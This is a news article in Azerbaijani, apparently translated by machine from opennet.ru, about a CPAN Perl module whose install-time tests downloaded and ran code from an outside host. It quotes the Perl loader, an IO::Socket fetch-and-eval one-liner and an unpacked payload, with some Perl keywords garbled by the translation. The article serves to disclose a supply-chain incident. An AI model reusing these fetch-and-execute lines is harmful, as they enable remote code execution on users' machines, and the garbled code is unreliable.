CPAN kataloqu vasitəsilə paylanmış Perl paketində CPAN modullarını tez bir zamanda avtomatik yükləmək üçün nəzərdə tutulmuşdur, zərərli kod. Zərərli daxiletmə idi test kodunda , 2011-ci ildən göndərilir.
Maraqlıdır ki, şübhəli kodun yüklənməsi ilə bağlı suallar yaranıb 2016-cı ildə.
Zərərli fəaliyyət modulun quraşdırılması zamanı işə salınan test paketinin icrası zamanı üçüncü tərəf serverindən (http://r.cx:1/) kodu endirmək və icra etmək cəhdi ilə nəticələnir. İlkin olaraq xarici serverdən yüklənmiş kodun zərərli olmadığı güman edilir, lakin indi sorğu kodun öz hissəsini icra üçün təmin edən ww.limera1n.com domeninə yönləndirilir.
Faylda yükləməni təşkil etmək üçün Aşağıdakı kod istifadə olunur:
mənim $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
mənim $try = `$^X $prog`;
Göstərilən kod skriptin icrasına səbəb olur , məzmunu sətirə endirilir:
lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88 istifadə edin.":1″};
Bu skript yüklənir xidmətdən istifadə etməklə xarici hostdan r.cx kodu (82.46.99.88 simvol kodları "R.cX" mətninə uyğundur) və onu qiymətləndirmə blokunda icra edir.
$ perl -MIO::Socket -e'$b=yeni IO::Socket::INET 82.46.99.88.":1″; çap <$b>;'
eval unpack u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}
Qablaşdırmadan çıxarıldıqdan sonra, nəticədə aşağıdakılar yerinə yetirilir: :
çap edin{$b=new IO::Socket::INET"ww.limera1n.com:80″}"GET /iJailBreak
";evalor return warn$@while$b;1
Problemli paket indi depodan silindi. (Perl Müəlliflər Yükləmə Serveri) və modul müəllifinin hesabı bloklanıb. Bu vəziyyətdə modul hələ də qalır MetaCPAN arxivindədir və cpanminus kimi bəzi yardım proqramlarından istifadə etməklə birbaşa MetaCPAN-dan quraşdırıla bilər. paketin geniş yayılmadığını.
Müzakirə etmək maraqlıdır və onun “r.cx” saytı sındırıldıqdan sonra zərərli kodun daxil edilməsi barədə məlumatı təkzib edən və sadəcə əyləndiyini izah edən modulun müəllifi, nəyisə gizlətmək üçün deyil, ölçüsünü azaltmaq üçün perlobfuscator.com saytından istifadə edib. kodun və onun mübadilə buferi vasitəsilə surətinin sadələşdirilməsi. “botstrap” funksiya adının seçilməsi bu sözün “bot kimi səslənməsi və bootstrap-dan daha qısa olması” ilə izah olunur. Modulun müəllifi həmçinin əmin edib ki, müəyyən edilmiş manipulyasiyalar zərərli hərəkətlər etmir, sadəcə TCP vasitəsilə kodun yüklənməsini və icrasını nümayiş etdirir.
Mənbə: opennet.ru